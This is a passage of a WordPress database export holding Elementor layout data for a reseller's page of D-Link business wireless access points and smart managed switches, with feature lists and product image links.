Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7198,3357,'_elementor_version','2.5.14'),(7199,3357,'_elementor_edit_mode','builder'),(7202,3358,'_wp_page_template','template-fullwidth.php'),(7203,3358,'_elementor_template_type','post'),(7204,3358,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf 